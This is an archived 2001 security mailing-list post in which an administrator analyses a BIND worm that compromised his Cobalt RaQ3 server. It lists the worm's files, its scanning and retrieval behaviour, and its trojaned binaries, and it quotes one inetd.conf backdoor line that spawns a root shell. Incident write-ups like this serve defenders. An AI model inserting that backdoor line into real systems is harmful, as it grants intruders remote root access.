[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[cobalt-security] profile of a bind worm
- Subject: [cobalt-security] profile of a bind worm
- From: "Kevin D" <kdlists@xxxxxxxxxxxxxxx>
- Date: Mon, 11 Jun 2001 10:38:03 -0400
- List-id: Mailing list for users to address network security on Cobalt products. <cobalt-security.list.cobalt.com>
I had a very interesting encounter with a bind worm this weekend, and I
thought the list might benefit from what I found.
When the bind vulnerability advisory for bind 8.2.2 was published several
months ago, I applied the RPM to upgrade bind before Cobalt produced their
.pkg file. On wednesday, I performed several overdue updates to my cobalt
raq3 server, and one of these updates uncluded OS Update 4.0. What I did not
realize was that OS Update 4.0 by cobalt included an updated 8.2.2 version
of bind. In effect, the OS Update 4.0 downgraded my version of bind from
8.2.3 to the vulnerable 8.2.2. Let me make it clear that this was my fault,
as I should have read the docs that accompanied this update X-(
On sunday, I received an email from our What's Up monitoring service saying
that my raq3's dns service had been restarted, so I logged into the server
and performed some quick checks. A ps ax revealed a ton of processes running
called w0rmssscanner and one called w0rmssserver.
My server was compromised on Sunday, just 4 days after downgrading to bind
8.2.2. The worm that attacked my server used the bind vulnerability to
install itself into /home/tmp/.tmp
Here is what that directory looked like (ls -lc):
-rw-r--r-- 1 named root 2578 Jun 10 15:02 nameds
-rwxr-xr-x 1 named root 50148 Jun 10 10:51 LS
-rwxr-xr-x 1 named root 138703 Jun 10 10:51 ls
drwxr-xr-x 2 named root 1024 Jun 10 10:51 stuff
drwxr-xr-x 2 named root 1024 Jun 10 10:51 log
-rw------- 1 named root 5 Jun 10 10:51 pid
-rw-r--r-- 1 named root 209 Jun 10 10:51 conf
-rwxr-xr-x 1 named root 5081 Jun 10 10:51 du
-rw-r--r-- 1 named root 2942 Jun 10 10:51 inetd.conf
-rw-r--r-- 1 named root 13 Jun 10 10:51 lsfile
-rw-r--r-- 1 named root 7354 Jun 10 10:51 mime.types
-rwxr-xr-x 1 named root 5161 Jun 10 10:51 ps
-rwxr-xr-x 1 named root 477 Jun 10 10:51 w0rmIP
-rwxr-xr-x 1 named root 9659 Jun 10 10:51 w0rmlinx
-rwxr-xr-x 1 named root 35 Jun 10 10:51 w0rmlinx.sh
-rwxr-xr-x 1 named root 7006 Jun 10 10:51 w0rmmigs
-rwxr-xr-x 1 named root 36036 Jun 10 10:51 w0rmserver
-rwxr-xr-x 1 named root 16576 Jun 10 10:51 w0rmssscan
-rwxr-xr-x 1 named root 1385 Jun 10 10:51 w0rmstart
I then checked the messages log to find several mysterious log messages from
inetd that started on Jun 10 10:51A. This time corresponded with the create
times of the files listed above. Every 10 minutes from then on, there were 3
log entries from inetd that claimed named permissions problems.
I ran some netstat commands and found that w0rmssserver was listening on
port 12321, and the many processes of w0rmssscan processes were creating
connections to various servers on the internet on port 53 - probably
scanning for other vulnerable bind servers.
I copied the contents of /home/tmp/.tmp to my home directory and examined
w0rmstart, an sh shell script. This script retrieved hacked binaries of ls,
ps, and netstat, and also the w0rmssserver and w0rmssscan files, from
another server. The script performed this retrieval by connecting to the
remote server on port 12321 - the same port on which w0rmssserver is set up
to listen.
The script then started w0rmsserver and w0rmssscan processes. The script
also tried to create a backdoor in inetd.conf by appending the following
line to inetd.conf: "ingreslock stream tcp nowait root /bin/sh sh -i"
The script then started inetd, without killing the currently running version
of inetd. This created the message log entries about named permissions
problems mentioned above. The second inetd process was trying to bind ports
for services that were already running with the first version of inetd, and
the second inetd process was running as user named, not root.
The script started another, called tr0jan, which attempted to copy the
hacked binaries over the originals. This script was responsible for killing
the inetd process, and installing an sshd trojan back door. It also tried to
install a version of bind, which seems to link it in some way to the cheese
worm. Maybe this was done to prevent others from hacking the owned box? The
script deleted itself when it finished, probably to cover hide which files
were trojaned.
Thankfully, because my bind server was running as user named, the worm was
unable to compromise my ls, ps and netstat files, and was unable to modify
my inetd.conf file. Had my ls, ps and netstat files been modified, my
baseline file scanner, fcheck, would have picked up the changes, but I would
have had to reload those files to find the worm.
At this point, I decided to kill all of the worm's processes. In hindsight,
this was not a terribly good idea, as it may have triggered some kind of
bomb planted in the worm. I should have frozen the processes and killed them
off from their frozen state.
If anyone is fond of looking at hex dumps, I have all of the worms files,
and I can send them to you off list if you like.
Kevin